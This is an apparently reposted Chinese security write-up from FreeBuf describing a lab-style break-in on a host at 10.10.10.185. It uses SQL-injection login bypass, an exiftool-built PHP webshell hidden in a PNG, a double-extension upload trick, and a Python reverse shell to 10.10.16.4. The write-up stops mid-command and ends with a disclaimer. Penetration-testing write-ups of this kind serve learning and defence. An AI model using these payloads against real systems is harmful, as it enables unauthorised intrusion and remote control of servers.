记一次多种漏洞组合利用突破内网管理员权限的过程
主站 分类 云安全 AI安全 开发安全 2025-11-11 08:15:7 Author: www.freebuf.com(查看原文) 阅读量:1 收藏

freeBuf

主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

信息收集

1.端口扫描

发现存在22和80端口。

1762848442_6912eeba68f3e94a3b36e.png!small?17628484428931762848448_6912eec06aaa2ad91e211.png!small?1762848449436

2.SQL注入

发现存在SQL注入万能密码进行登录。

1762848461_6912eecd213838f1c87fa.png!small?1762848462881

存在文件上传

1762848465_6912eed148d90734d1f63.png!small?1762848466241

3生成图片马进行文件上传

使用exiftool -Comment='<?php system($_REQUEST['cmd']); ?>' 1.png 生成一个图片马,图片在网上下一个.png格式的。

1762848477_6912eedd285adcd94576b.png!small?1762848477615

发现直接上传.png格式是无法上传成功的,将其改成1.php.png格式。再次进行上传。

1762848500_6912eef416364e1f62950.png!small?1762848500794

成功进行上传

1762848509_6912eefddb01b7e7512dd.png!small?1762848510648

漏洞利用:

1.命令执行

上传之后,发现可以执行命令。

1762848518_6912ef06e6c538dbeb9a2.png!small?1762848519855

2.反弹低权限shell

利用python3:ython3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.4",8833));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'进行反弹shell,然后在浏览器进行访问

http://10.10.10.185/images/uploads/1.php.jpg?0=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.2",8833));os.dup2(s.fi

免责声明

1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。

2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。

3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。

已在FreeBuf发表 0 篇文章

本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)


文章来源: https://www.freebuf.com/articles/sectool/456470.html
如有侵权请联系:admin#unsafe.sh